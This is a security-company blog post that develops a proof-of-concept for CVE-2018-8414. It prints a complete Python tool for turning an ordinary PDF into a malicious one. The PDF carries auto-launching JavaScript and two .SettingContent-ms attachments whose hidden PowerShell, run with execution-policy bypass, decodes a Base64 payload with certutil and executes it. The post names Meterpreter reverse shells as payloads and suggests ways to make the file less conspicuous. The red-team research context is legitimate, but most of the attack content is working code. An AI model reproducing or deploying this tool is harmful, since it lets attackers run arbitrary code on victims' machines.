PDF Files | Software | 6point6

Home → Insights → CVE-2018-8414: Abusing PDF files

Introduction

This blog covers the development of a PoC for the public vulnerability, CVE-2018-8414. A member of the red team had approached me saying that one of our client’s websites would accept PDF files so he was trying to develop the PoC of this known vulnerability, inserting the exploit file as an attachment to a PDF file. He had hit a road block and had to continue penetration testing, so he asked if I could do it, and the journey began.

The first section of the blog introduces the vulnerability and what exactly we will be exploiting. We will then cover a script for embedding files into PDFs. At the very end I will discuss some improvements that could be made to enhance this sort of attack, and there’s a video of the demo in action.

Requirements

A couple of things to note about this exploit:

Vulnerable Systems: Windows 10 Pro x64 – 1803 released on April 30, 2018 (And older)
Vulnerable Software: Adobe Acrobat Reader DC 18.011.20055 (July 10, 2018 update and older)
Abused Shell: Powershell v1.0

This vulnerability affects Office 365, Adobe Acrobat Reader DC (as we will see) as well as older versions of Firefox and Chrome. Check out the CVE page for a more detailed description on the updates.

The script was written in python, the tools I used were:

Python 3.7.4
PyPDF4 library
pdftk (A command line tool for processing pdf files on Linux)

Background Info

.SettingContent Files

These XML files were originally implemented by Microsoft in Windows 8.1. They contain settings content for Windows functions, such as how updates are installed or what default apps should be used to open particular file types.

The vulnerability

In late 2018, a Windows vulnerability was found by a hobbyist security researcher who goes by enigma0x3. The .SettingContent-MS files have an interesting attribute, <DeepLink>. When a .SettingContent-MS file is is clicked on, the <DeepLink> attribute will be able to make a call to any executable. However this attribute has a 517 character limit, thus making it hard to inject foreign .exe payloads.

We need to work around this by using the <Icon> attribute which has an unlimited buffer, and can take any size payload you choose to deliver. Obviously the smaller the payload the better, as it will be less noticeable in the final malicious file’s size.

Figure 1.1: The XML format and the attribute abused in the python script POC

As seen in Figure 1.1, the content of the <DeepLink> attribute will be changed; It can make calls to programs such as command prompt or Powershell, which an attacker can then use to drop off a payload.

DeepLink powershell

"<DeepLink><![CDATA[%windir%\system32\WindowsPowerShell\\v1.0\powershell.exe -Windowstyle hidden -ep bypass -c $file = Get-ChildItem -Path $env:TEMP -Include Payload.SettingContent-ms -File -Recurse -name; $fpath = $env:TEMP + '\\' + $file; $Store = Select-String -Path $fpath -Pattern '<Icon>';$Store = $Store -replace([regex]::Escape($fpath + ':7:<Icon>'), '');$Store = $Store -replace('</Icon>', '');Invoke-Expression $Store; certutil -decode $env:TEMP\evil.b64 $env:TEMP\evil.exe; Invoke-Expression ($env:TEMP + '\evil.exe')]]></DeepLink>"

The above string is the one I will replace my attribute with in this demo. It finds the Base64 encoded payload, decodes it, saves the contents to an .exe file, and then executes it.

Figure 1.2: The XML format and the attribute used to store the payload in the Python script PoC

Since we are using Powershell we need to include our Powershell formatted command, which injects the payload into a file:

Icon Tag Payload

<Icon>Write-Output \"" + payload + "\" > $env:TEMP\\evil.b64 \n</Icon>

Python scripting

I wrote a python script that takes a given PDF, a payload to embed into it and a name for the new PDF:

./pdfexploit.py -i Input_PDF -p Payload -o Output PDF

The -i indicates the input PDF which we will hide the malware in, our payload -p is a file we want to hide (such as a Meterpreter reverse shell or any other .exe file), and an output PDF -o which is where the new malicious PDF will be created.

The following explains the operation of this script.

Exploit chain

These are the steps required to exploit the vulnerability

A regular harmless PDF is opened in Python script.
JavaScript is embedded in PDF file to launch files embedded within the document.
The first .SettingContent-MS file is embedded within the PDF document.
1. This .Setting-Content-MS allows us to launch a Powershell window by abusing the <DeepLink> attribute.
The second .SettingContent-MS file is embedded within the PDF document.
1. This .Setting-Content-MS hosts file hosts the payload alongside some Powershell instruction to output the payload into a .b64 file.
2. We store the payload in the <Icon> attribute section since it does not have a character limit.
3. The reason we store the payload in a separate file is because we cannot parse the data properly if they’re contained in the same file, since the <DeepLink> attribute contains overlapping information with the <Icon> attribute.
Both files are now embedded in the PDF using a command line tool and a malicious PDF is outputted.
Once the PDF is opened it will automatically launch a user dialog box confirming if they’d like to open attachments with this PDF, once they confirm it will execute the malicious payload.

This is a general outline of what’s happening throughout the process of the script, with that in mind we can dig into the technical parts.

Embedding auto-run JavaScript

Since the probability of a user actually clicking the attachment is low, we can trigger the files to open automatically on opening the PDF, the default option will prompt the user with a small dialogue box, if they haven’t selected “Always allow opening files of this type” or “Never allow opening files of this type“, the former causing the files to launch immediately and the latter forcing them to manually open it.

The JS is embedded into a PDF using the following Python function:

# Create malicious pdf

def addJS():

malicious_pdf = PdfFileWriter()

# Open file passed as -i parameter
with open(args.input, "rb") as f:

        pdfReader = PdfFileReader(f)

        # Copy pages of original pdf file to malicious pdf file

        for page in range(pdfReader.numPages):

            pageObj = pdfReader.getPage(page)

            malicious_pdf.addPage(pageObj)

        malicious_pdf.addJS("var files = [\"Payload\", \"psFile\"]; for (var i = 0; i < files.length; i++) { this.exportDataObject( {cName: files[i] + \".SettingContent-ms\", nLaunch: 2} ); }")


        # Create malicious pdf using -o parameter as file name

        output = open(args.output, "wb+")

        malicious_pdf.write(output)

        output.close()

    f.close()

Using the PyPDF4 library we create a PdfFileWriter() object, this will be used to copy the contents of the input PDF into another PDF that also includes the embedded JavaScript. We copy the contents of each page as seen in the for loop. We then add our JavaScript to our newly created PDF using PyPDF’s built in function addJS(). Lastly we write the contents of this object to the output provided by the user creating a new PDF which contains the contents of the initial PDF with the addition of the JavaScript.

var files = ["Payload", "psFile"];

for (var i = 0; i < files.length; i++) {
    this.exportDataObject( {cName: files[i] + ".SettingContent-ms", nLaunch: 2} );
}

The JavaScript is pretty simple, we create an array holding the file names of the malicious files we embedded. We then enter a for loop and iterate through the files array we created this.exportDataObject() function takes in two arguments and extracts the attachments from the PDF. The first, cName, being the name of the file which is then concatenated with “.SettingContent-ms” in run-time in order to give it the privileges to execute. The second parameter nLaunch which will save and open the attachment when given a value of 2.

As shown above, the JavaScript will extract the embedded files. This only happens after the user has hit ‘OK’ on the following popup:

Figure 3.1: Pop-Up Produced by PDF

The figure above shows the pop-up and the name of the file to be opened, the name can obviously be changed to be less conspicuous, but once the user clicks ‘OK’ it will automatically extract the embedded files and execute whatever calls are hidden in the DeepLink attribute.

Base64 encoding the icon file

After embedding the JavaScript into the PDF, we now need to move on to creating the files. This starts with checking the encoding on the payload. The user can embed any sort of payload into the PDF file, most commonly it will be a binary executable or its Base64 representation, if they chose to encode the file themselves beforehand. The script handles both scenarios with a Base64 encoding check, and will execute differently depending on if the payload is encoded or not. Below we can see the Base64 check code.

# Check if payload provided is base64 encoded
def isBase64(payload, filename):
    isb64 = True
    if(filename.endswith('.b64')):
        try:
            base64.b64decode(payload)
        except binascii.Error:
            isb64 = False
    else:
        isb64 = False
    return isb64

This will check if the payload file is in Base64 by first checking the filenames extension and then checking if it’s contents can actually be decoded.

Creating the malicious .SettingsContent Files

After checking whether the payload was Base64 encoded we can then pass its raw content’s to the create_putfile function. This will create the XML formatted settings content file with the customised <Icon> content containing the payload.

# Create payload file to embed
def create_putfile(payload, b64):
    putfile = scm.split("\n")
    if b64:
        payload = payload.decode()
        payload = payload.split('\n')
        payload = "".join(payload)
        putfile[6] = "Write-Output \"" + payload + "\" > $env:TEMP\\evil.b64 \n"
    else:
        payload = base64.b64encode(payload)
        payload = payload.decode()
        payload = payload.split('\n')
        payload = "".join(payload)
        
        putfile[6] = "Write-Output \"" + payload + "\" > $env:TEMP\\evil.b64 \n"
    
    return "\n".join(putfile)

First we split the contents of the XML file seen at the beginning and store it in an array. Using the boolean b64 we check if the payload was already encoded, we simply decode it from bytes to str (not from Base64 to ascii). We then strip the payload of any new lines since this will halt the program on execution if it includes any. Lastly we edit the Icon’s content to include the payload and output it to the TEMP path in a file called evil.b64, and then add a \n otherwise the closing Icon tag will not be detected by the XML file.

In the case where the payload isn’t Base64 encoded, we simply encode it before passing it through the same process.

Now we that we have a file containing the payload, we need to create another file which includes the Powershell in order to find the contents of the Icon tag in the other file and execute them. We will call this file psScript, which is created using the create_powershell function.

# Create powershell script to embed in file and execute payload
def create_powershell():
    psFile = scm.split("\n")
    psFile[5] = "<![CDATA[%windir%\system32\WindowsPowerShell\\v1.0\powershell.exe -Windowstyle hidden -ep bypass -c $file = Get-ChildItem -Path $env:TEMP -Include Payload.SettingContent-ms -File -Recurse -name; $fpath = $env:TEMP + '\\' + $file; $Store = Select-String -Path $fpath -Pattern '';$Store = $Store -replace([regex]::Escape($fpath + ':7:'), '');$Store = $Store -replace('', '');Invoke-Expression $Store; certutil -decode $env:TEMP\evil.b64 $env:TEMP\evil.exe; Invoke-Expression ($env:TEMP + '\evil.exe')]]>"
    
    return "\n".join(psFile)

As we did previously we will split the XML file into an array and now we will change the DeepLink’s contents to our Powershell script. I’ll break this up into several parts so it’s more clear. For starters everything is encapsulated in <![CDATA[powershell]]>, otherwise the semi-colons will cause it to break and it won’t complete.

%windir%\system32\WindowsPowerShell\\v1.0\powershell.exe -Windowstyle hidden -ep bypass -c

This line calls the powershell.exe to be opened with special flags. -Windowstyle hidden indicated that the Powershell script will close immediately so the user will barely catch a glimpse, and -ep bypass -c are used to bypass the execution policy rules set by Powershell allowing us to act as root.

$file = Get-ChildItem -Path $env:TEMP -Include Payload.SettingContent-ms -File -Recurse -name;

Knowing that Adobe stores its attachments in the temp folder, and having named the payload ourselves (in the script it’s set to /payload.SettingContent-ms regardless of what the input given was), we can search the temp folder for a file with that name and store it in the $file variable.

$fpath = $env:TEMP + '\\' + $file;

Since we are searching within the temporary folder, the path it returns excludes the temporary directory and all parent directories so we need to concatenate it with the above, and is now stored in $fpath variable.

$Store = Select-String -Path $fpath -Pattern '';

Now that we have the full path to the file, we get a string from the file which is contained between the icon tags but including the tags. This is stored in the $Store variable.

$Store = $Store -replace([regex]::Escape($fpath + ':7:'), '');
$Store = $Store -replace('', '');

Powershell sticks on the path of the file it pulled the string from as well as ‘:7:’ so we need to strip these, and update our variable. We use the regex escape since the file path contains backslashes and trying to normally replace it will result in an error. We replace it with nothing and update our variable. The second line strips the trailing icon tag and updates the variable one last time.

Invoke-Expression $Store

Invoke-Expression can take a string, and treat is as a command line argument. Above we mentioned we had the command Write-Output in our Icon tag, this is the equivalent of echo in cmd and is treated as a command. We then pass it the argument which is our Base64 encoded payload, and it will create theevil.b64 file in our temp directory. Now that $Store is stripped of the unnecessary information, Invoke-Expression executes the contents as a Powershell command.

certutil -decode $env:TEMP\evil.b64 $env:TEMP\evil.exe;

Using Microsoft’s built in command certutil we can decode the base64 file, and choose an output location.

Invoke-Expression ($env:TEMP + '\evil.exe')

Lastly, we want to execute the malicious payload, so we concatenate the file name with it’s path. Since it is now a string we can once again call the Invoke-Expression command to execute it.

Putting it all together

Now that we’ve successfully created our carefully created XML files, we must embed them into the PDF so the JavaScript actually has something to extract.

# Insert payload and powershell script into pdf
def insertMaliciousFiles():
    raw_payload = ""
    # Read contents of payload file
    with open(args.payload, "rb") as payload:
        raw_payload = payload.read()
    
    payload.close()
    # Check if payload is base64 encoded
    var = isBase64(raw_payload, args.payload)
    # Create malicious files
    putFile = create_putfile(raw_payload, var)
    psFile = create_powershell()
    files = [putFile, psFile]
    fileNames = ["Payload.SettingContent-ms", "psFile.SettingContent-ms"]
    # Create the files, write to them and then attach them using pdftk
    malput = [args.output]
    fileNames.append(malput[0])
    for i in range(len(files)):
        tmp = open(fileNames[i], "w")
        tmp.write(files[i])
        tmp.close()
        malput.append('out' + str(i) + '.pdf' )
        fileNames.append(malput[i+1])
        os.system('pdftk ' + malput[i] + ' attach_file ' + fileNames[i] + ' output ' + malput[i+1])
    
    print("Attached encoded files!")
    return fileNames

We start by opening the payload file and reading its contents, storing them in the raw_payload variable. This function essentially checks if the payload is encoded in Base64, and then creates the two malicious files, one holding the payload, the other holding the Powershell script. We then attach the malicious files to a PDF using the command line tool pdftk.

The reason we created malput and had to open and write to the files is due to the fact that we need to use a command line tool called pdftk. Unfortunately no current PDF library on python supports the attachments of several files, however this command line tool can do it one by one. It was rather cumbersome to edit the PyPDF4 library, as originally planned, in order to add multiple file attachments method so I resorted to this process. Using pdftk we take output file containing the JavaScript and attach the payload file, this is then outputted to the arbitrary file created. This loops until all files are attached, in this case it only happens twice. The function then returns the fileNames array which holds all the files created.

Cleaning Up (Attacker Side)

This was a bonus function I added to the script so the attacker isn’t flooded with useless files, and it deletes the extra created files.

# Delete extra files created
def cleanup(fileNames):
    for i in range(len(fileNames)-1):
        os.system('rm ' + fileNames[i])
    os.system('mv ' + fileNames[len(fileNames)-1] + ' ' + args.output)

As you can see it is a pretty simple, I take the array of file names returned by the inputMaliciousFiles() function and iterate through it’s elements. I delete them using Python’s OS library and the rm command. Once I’ve deleted all the files, except the last one I leave the for loop and simple rename it to what the attacker originally gave as the output argument.

Conclusion

The exploit can be powerful, enough so to drop a reverse shell on an unsuspecting victim. There were several road blocks I faced, primarily with embedding the files and creating the Powershell scripts. Since we are not embedding the payload in the same file, we could hide it in less conspicuous files, possibly a .txtfile or a .csv which only contains the Powershell command and the payload.

Another possible option to further explore is to embed the .SettingContent-msfiles in images using Steganography.js, and then embedding those images to the PDF to seem less obvious. We could then possibly apply the embedded JavaScript in the PDF to unearth the files and execute them.

For our latest research, and for links and comments on other research, follow our Lab on Twitter.

Get in touch if you’d like to chat to us.

Our thinking

Cyber Security

CVE-2018-8414: Abusing PDF files